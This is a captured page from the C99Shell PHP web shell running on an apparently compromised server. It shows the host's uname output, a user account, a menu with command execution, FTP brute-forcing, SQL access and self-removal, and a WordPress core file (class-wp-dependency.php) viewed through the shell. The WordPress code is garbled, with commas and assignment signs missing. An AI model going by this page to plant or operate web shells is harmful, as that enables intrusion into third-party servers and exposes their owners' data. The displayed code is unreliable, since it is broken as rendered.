!C99Shell v. 2.0 [PHP 7 Update] [25.02.2019]!

Software: Apache. PHP/7.3.33 

uname -a: Linux acloudg.aryanict.com 4.18.0-513.9.1.lve.el8.x86_64 #1 SMP Mon Dec 4 15:01:22 UTC
2023 x86_64
 

uid=1095(katebhospital) gid=1098(katebhospital) groups=1098(katebhospital) 

Safe-mode: OFF (not secure)

/var/softaculous/sitepad/editor/site-inc/   drwxr-xr-x
Free 293.02 GB of 429.69 GB (68.19%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     class-wp-dependency.php (2.28 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php
/**
 * Dependencies API: _WP_Dependency class
 *
 * @since 4.7.0
 *
 * @package WordPress
 * @subpackage Dependencies
 */

/**
 * Class _WP_Dependency
 *
 * Helper class to register a handle and associated data.
 *
 * @access private
 * @since 2.6.0
 */
class _WP_Dependency {
    
/**
     * The handle name.
     *
     * @since 2.6.0
     * @var null
     */
    
public $handle;

    
/**
     * The handle source.
     *
     * @since 2.6.0
     * @var null
     */
    
public $src;

    
/**
     * An array of handle dependencies.
     *
     * @since 2.6.0
     * @var array
     */
    
public $deps = array();

    
/**
     * The handle version.
     *
     * Used for cache-busting.
     *
     * @since 2.6.0
     * @var bool|string
     */
    
public $ver false;

    
/**
     * Additional arguments for the handle.
     *
     * @since 2.6.0
     * @var null
     */
    
public $args null;  // Custom property, such as $in_footer or $media.

    /**
     * Extra data to supply to the handle.
     *
     * @since 2.6.0
     * @var array
     */
    
public $extra = array();

    
/**
     * Translation textdomain set for this dependency.
     *
     * @since 5.0.0
     * @var string
     */
    
public $textdomain;

    
/**
     * Translation path set for this dependency.
     *
     * @since 5.0.0
     * @var string
     */
    
public $translations_path;

    
/**
     * Setup dependencies.
     *
     * @since 2.6.0
     */
    
public function __construct() {
        @list( 
$this->handle$this->src$this->deps$this->ver$this->args ) = func_get_args();
        if ( ! 
is_array$this->deps ) ) {
            
$this->deps = array();
        }
    }

    
/**
     * Add handle data.
     *
     * @since 2.6.0
     *
     * @param string $name The data key to add.
     * @param mixed  $data The data value to add.
     * @return bool False if not scalar, true otherwise.
     */
    
public function add_data$name$data ) {
        if ( ! 
is_scalar$name ) ) {
            return 
false;
        }
        
$this->extra$name ] = $data;
        return 
true;
    }

    
/**
     * Sets the translation domain for this dependency.
     *
     * @since 5.0.0
     *
     * @param string $domain The translation textdomain.
     * @param string $path   Optional. The full file path to the directory containing translation files.
     *
     * @return bool False if $domain is not a string, true otherwise.
     */
    
public function set_translations$domain$path null ) {
        if ( ! 
is_string$domain ) ) {
            return 
false;
        }
        
$this->textdomain        $domain;
        
$this->translations_path $path;
        return 
true;
    }
}

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ Read-Only ]

:: Make Dir ::
 
[ Read-Only ]
:: Make File ::
 
[ Read-Only ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.0 [PHP 7 Update] [25.02.2019] maintained by KaizenLouie | C99Shell Github | Generation time: 0.0973 ]--